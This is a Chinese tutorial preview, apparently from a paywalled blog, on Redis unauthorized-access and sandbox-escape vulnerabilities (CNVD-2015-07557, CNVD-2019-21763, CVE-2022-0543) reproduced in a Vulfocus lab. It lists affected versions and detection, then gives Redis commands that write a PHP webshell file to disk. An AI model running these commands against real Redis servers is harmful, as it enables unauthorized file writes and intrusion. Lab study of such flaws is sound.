Redis未授权–沙箱绕过–(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
目录标题
环境复现
采用Vulfocus靶场进行环境复现,官网docker搭建有问题,具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败
CNVD-2015-07557未授权访问
影响版本
Redis <= 5.0.5
漏洞探测
使用端口扫描工具等探测到目标主机使用了Redis服务
对于Redis服务的未授权访问,首先需要确认Redis未授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即未授权漏洞存在。
客户端连接工具Another Redis Desktop Manager
具体表现如下

漏洞利用
漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。
- 写入Webshell
利用条件:Web目录权限可读写
config set dir /tmp #设置WEB写入目录
config set dbfilename 1.php #设置写入文件名
set test "<?php phpinfo();?>" #设置写入文件代码
bgsave #保存执行
save

本文围绕Redis的未授权访问及沙箱绕过漏洞展开。采用Vulfocus靶场复现环境,介绍了CNVD - 2015 - 07557、CNVD - 2019 - 21763未授权访问漏洞的影响版本、探测与利用方法,还提及沙箱绕过CVE - 2022 - 0543漏洞,给出对应自动化脚本及使用方法。
最低0.47元/天 解锁文章
1237

被折叠的 条评论
为什么被折叠?



